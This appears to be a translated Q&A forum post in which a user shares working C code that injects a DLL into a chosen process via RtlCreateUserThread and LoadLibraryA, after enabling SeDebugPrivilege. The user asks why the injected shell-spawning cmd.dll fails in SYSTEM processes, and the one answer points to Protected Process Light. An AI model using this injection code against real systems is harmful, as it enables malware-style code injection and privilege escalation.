用RltCreateUserThread注入Dll

时间:2016-06-22 08:32:27

标签: dll-injection

我写了一个注入dll的程序。 我正在使用RltCreateUserThread。有谁能告诉我我在这里做错了什么。我能够在进程中注入dll,但是注入的dll在注入到与我当前权限相同的进程时会生成cmd shell,但是当我将它们注入到系统/本地服务帐户进程时,它不会抛出shell。我正在使用来自ReactOS的Didier Stevens网站的cmd.dll。我试图从Windows 7 32位。

#include <Windows.h>
#include <stdio.h>
#include <stdbool.h>


typedef struct _CLIENT_ID
  {
    PVOID UniqueProcess;
    PVOID UniqueThread;
  } CLIENT_ID, *PCLIENT_ID;

typedef long (*_RtlCreateUserThread)(HANDLE,
    PSECURITY_DESCRIPTOR,
    BOOLEAN,ULONG,
    PULONG,PULONG,
    PVOID,PVOID,
    PHANDLE,PCLIENT_ID);

_RtlCreateUserThread RtlCreateUserThread;

int main(){
    HANDLE hThd, hModule;
    CLIENT_ID cid;
    DWORD pid;
    char * dll="cmd.dll";


HMODULE ntdll=LoadLibrary("ntdll.dll");
HMODULE k32=LoadLibrary("kernel32.dll");

RtlCreateUserThread=GetProcAddress(ntdll,"RtlCreateUserThread");
printf( "Enter pid :");
scanf("%u", &pid);

LUID luid;
HANDLE token_handle;
LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid);
TOKEN_PRIVILEGES tp;
tp.Privileges[0].Luid=luid;
tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
tp.PrivilegeCount=1;
OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&token_handle);
AdjustTokenPrivileges(token_handle,false,&tp,sizeof(tp),NULL,NULL);



HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,false,pid);
LPVOID vaex=VirtualAllocEx(hProc,NULL,strlen(dll) + 1,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProc,vaex,dll,strlen(dll),NULL);
RtlCreateUserThread(hProc,NULL,false,0,0,0,(PVOID)GetProcAddress(k32,"LoadLibraryA"),vaex,&hThd,&cid);
WaitForSingleObject(hThd,INFINITE);

CloseHandle(hThd);
CloseHandle(hProc);

FreeLibrary(k32);
FreeLibrary(ntdll);

return 0;
}

感谢, 拉加。

1 个答案:

答案 0 :(得分:0)

您不能注入具有受保护的过程光保护的系统进程。

阅读Evolution of PPLPPL Killer

这是自Windows 8 / 8.1以来的新保护机制